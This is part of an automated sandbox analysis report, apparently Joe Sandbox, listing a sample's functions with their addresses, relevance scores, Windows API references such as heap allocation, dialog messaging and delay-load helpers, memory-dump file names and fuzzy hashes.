String ID:
API String ID: 3519838083-0
Opcode ID: 5f4b4ac0ae36d206715604451095c87ff1b5afaaa621125ba4021236c4bc0b92
Instruction ID: 470e663e876465ca735e9a2c9d844f8b5e195961fc3abcbf177bf22cf9ce56c9
Opcode Fuzzy Hash: 5f4b4ac0ae36d206715604451095c87ff1b5afaaa621125ba4021236c4bc0b92
Instruction Fuzzy Hash: E4C1D074A04A669FEF15CF68C488BA97FA6BF06300F0844B9DC45DF282CB359D44CB69

Function 00593B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00593B42

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b85f656ff244aa92137b30cb796f3e976c520cdec12b2d42d81f478456455e9c
Instruction ID: 343f36e1afa6c2875618c1d6fdc5a8a59b5a3ab48a6cefb1b289bc052a89b696
Opcode Fuzzy Hash: b85f656ff244aa92137b30cb796f3e976c520cdec12b2d42d81f478456455e9c
Instruction Fuzzy Hash: 9671CC71104F45AEDF21DB74CC59AEBBBE8BF55301F44492EE5AB87242DA326A48CF10

Function 0059837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00598384

Part of subcall function 00591380: __EH_prolog.LIBCMT ref: 00591385
Part of subcall function 00591380: new.LIBCMT ref: 005913FE

Part of subcall function 005919A6: __EH_prolog.LIBCMT ref: 005919AB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4f29bcaab69a25a52e44488ef485e532d1b10486bcbfe244894ded4fb5650629
Instruction ID: ea7d4bc83983f67d9a97ad81a58004684238a31f6eedd3f3109dc71c68bc37e2
Opcode Fuzzy Hash: 4f29bcaab69a25a52e44488ef485e532d1b10486bcbfe244894ded4fb5650629
Instruction Fuzzy Hash: 564184318406569ADF20DB60CC59BFA7BACBF91304F0444EAE54E97093DF756AC8DB50

Function 00591E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00591E05

Part of subcall function 00593B3D: __EH_prolog.LIBCMT ref: 00593B42

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 606b2b1485936866186b92911b6c3db5b05d795aefff3ffd8d3fe9edb415bcd9
Instruction ID: 1e4e4ad0a1524153f969340bb9f2cf048260d0d9a52805c083a093903e4fc6bb
Opcode Fuzzy Hash: 606b2b1485936866186b92911b6c3db5b05d795aefff3ffd8d3fe9edb415bcd9
Instruction Fuzzy Hash: 2821373290451A9FCF11EF99D9559EEBFFABF99300F10046EE845A7251CB325E10CB64

Function 005AA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 005AA7C8

Part of subcall function 00591380: __EH_prolog.LIBCMT ref: 00591385
Part of subcall function 00591380: new.LIBCMT ref: 005913FE

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a84399ac691fc44b63c1b0d31b06d48fef40ac41cdb594d8f61e5440022ecaff
Instruction ID: 8a4d367e7645ad88af79cd0c3c1880bf537bde6461be153f837215b9debac906
Opcode Fuzzy Hash: a84399ac691fc44b63c1b0d31b06d48fef40ac41cdb594d8f61e5440022ecaff
Instruction Fuzzy Hash: F3215C71C0465AAACF15DF94C9569EEBFB4FF5A300F0004AEE809B3242DB356E06CB65

Function 005992E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 005992EB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 579f11f37d5b5ea1f00f2363d0976f82261d64613c947f450c3e9c7319e202ed
Instruction ID: 0e74b8bf0ebe1264e57e265c5fc6395da063ce93c5b4ca22f54d3ffb5cf58fcb
Opcode Fuzzy Hash: 579f11f37d5b5ea1f00f2363d0976f82261d64613c947f450c3e9c7319e202ed
Instruction Fuzzy Hash: 51118E73A1052A9BCF22AEACCC469DEBF36FF88750F054519F804A7251CA358D1086A0

Function 0059AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 0059AA9A

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: be52c074786a7377533d6feaf553b8e7720c8dfda2d2aadca767f630e8de0c92
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: D3F03C315147069FEF70DA65C94561ABBE8FB15320F20891AE49AC6690E770D880C7A2

Function 00595BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00595BDC

Part of subcall function 0059B07D: __EH_prolog.LIBCMT ref: 0059B082

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c9e4687b31b4d424afd47ab63d960d2748a8cbf9e94cd8c2b369758822117da1
Instruction ID: d9b2f09baf6300250923d3e78ffeb4eda7cb5fc8bbe2da27edf4352949213c8e
Opcode Fuzzy Hash: c9e4687b31b4d424afd47ab63d960d2748a8cbf9e94cd8c2b369758822117da1
Instruction Fuzzy Hash: D801A234900645DADB25F7A4D0493DDFFA8AF59300F40409DA45A53283CBB41B04C752

Function 005B8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 314797807f346a9b91a699904aea3424cb8eb683eeed26b5eb93e3fed2e60567
Instruction ID: 97d3787741082811dcd654da8719ea9a683968902c1f13451cb03f6892f62a50
Opcode Fuzzy Hash: 314797807f346a9b91a699904aea3424cb8eb683eeed26b5eb93e3fed2e60567
Instruction Fuzzy Hash: D6E0E531540626BBEB312A699C05BFA3F8CBB913B0F142610AC15E21C0CE20FC04C5E9

Function 0059A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0059A4F5

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a9c395db7e02c7406cb1be75a10d3b3b2d381739664aab79c0159c87fbdd0adf
Instruction ID: b582e17ee25270c5ba7d9e1aa4d0d630e5b18644857be7e31db5b61eebbec357
Opcode Fuzzy Hash: a9c395db7e02c7406cb1be75a10d3b3b2d381739664aab79c0159c87fbdd0adf
Instruction Fuzzy Hash: AFF0B431008780AACF221B784808BC67FA0BF55321F14CA09F5FD12192C27414859773

Function 005A067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 005A06B1

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 87ced4a651687965789f7e5572178fb85805405fbf97fe522b0f6415d3cab4da
Instruction ID: dae65a64eec3a26b657cf7ee7608c12d65aa2bab1b883123d731d91b809c1c44
Opcode Fuzzy Hash: 87ced4a651687965789f7e5572178fb85805405fbf97fe522b0f6415d3cab4da
Instruction Fuzzy Hash: 72D02B2521111229CF313728E84D7FF1E0B7FC3721F081023B00D172C78B4A088E52E2

Function 005A9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 005A9D81

Part of subcall function 005A9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 005A9B30

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 5972c7d55ed47854d2a8ebec4f2d52b9164be7f5574531805b0141e2cacfddf5
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: B1D0A73021821E7ADF40BA708C03A7E7FA8FB42300F004025BC0986141ED71DE50A271

Function 00599989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00599887), ref: 00599995

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8bd509b9dd47360fcbace9e54ff5f0b9d466c0bb0551899dd09ea0d0b39ad31f
Instruction ID: 7a49ef855e8f45352cef01ea1d5abe8986494d910ad981992be8e8011662fecd
Opcode Fuzzy Hash: 8bd509b9dd47360fcbace9e54ff5f0b9d466c0bb0551899dd09ea0d0b39ad31f
Instruction Fuzzy Hash: D2D01232012541958F65963C4D094997F51EB83366B78D6ACD025C40A1D723C803F542

Function 005AD41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 005AD43F

Part of subcall function 005AAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005AAC85
Part of subcall function 005AAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005AAC96
Part of subcall function 005AAC74: IsDialogMessageW.USER32(00010406,?), ref: 005AACAA
Part of subcall function 005AAC74: TranslateMessage.USER32(?), ref: 005AACB8
Part of subcall function 005AAC74: DispatchMessageW.USER32(?), ref: 005AACC2

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 0e276c546898bd722a739fb5e79e5ae3b95d9d99946d0b8780a33bbd76e43e67
Instruction ID: 16e1ee5591ac6d5c123364ad2d74565d91ed476d007acfc2a19a33a803d03dfd
Opcode Fuzzy Hash: 0e276c546898bd722a739fb5e79e5ae3b95d9d99946d0b8780a33bbd76e43e67
Instruction Fuzzy Hash: 51D09E71144301ABDA122B51CE06F1F7EA6BB98B04F404555B344B40B186669D34EB16

Function 005AD8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6dc1dcefd8fa1efd3425b758f626dc903a20d63a0131a13dad2c01fc6cc37113
Instruction ID: e81a20f40bcfcceb031614723e2b686261d81f1e24f458d03a1a056ce30c2004
Opcode Fuzzy Hash: 6dc1dcefd8fa1efd3425b758f626dc903a20d63a0131a13dad2c01fc6cc37113
Instruction Fuzzy Hash: F8B092A12690026C31087144684AE3A0A68E4C3B11720881AB50BD2480D44458044431

Function 005AD8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 152777396ecf3cda3530e843e21c946c1cf54a5f360350559473848d37f9c3fc
Instruction ID: 88868156bad3984e142fe9928e77567bea287f1c3ae0ceb82c16a92c888e9925
Opcode Fuzzy Hash: 152777396ecf3cda3530e843e21c946c1cf54a5f360350559473848d37f9c3fc
Instruction Fuzzy Hash: 0CB092912680026D31087144694BE3A0A68E4C2B11720881EB10BD2580D544580A4431

Function 005AD8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 210588d2da918062fd5bc4f22c9d487e03989a6ab71a5b6bba211122813c8e60
Instruction ID: 1a959bb9634a28f57d787e64297314ef4c09fe4dfc24ea9229ac269582793942
Opcode Fuzzy Hash: 210588d2da918062fd5bc4f22c9d487e03989a6ab71a5b6bba211122813c8e60
Instruction Fuzzy Hash: BBB012D126C1036C314871446C4BF3F0F7CF4C2B11730891EB10BD25C0D5445C894431

Function 005AD8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9e4704a0ee59e7f75b526fbea19cb44569ec999d1abe6bd59b98bd66f6f303c9
Instruction ID: 182857201c061ed27f22dd91be001ade3d7fe8ec23b03d2d7810b839a38ebad6
Opcode Fuzzy Hash: 9e4704a0ee59e7f75b526fbea19cb44569ec999d1abe6bd59b98bd66f6f303c9
Instruction Fuzzy Hash: 25B092A12680026C31087145684AE3A0A68F4C2B11720481AB10BD2480D44458044431

Function 005AD8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
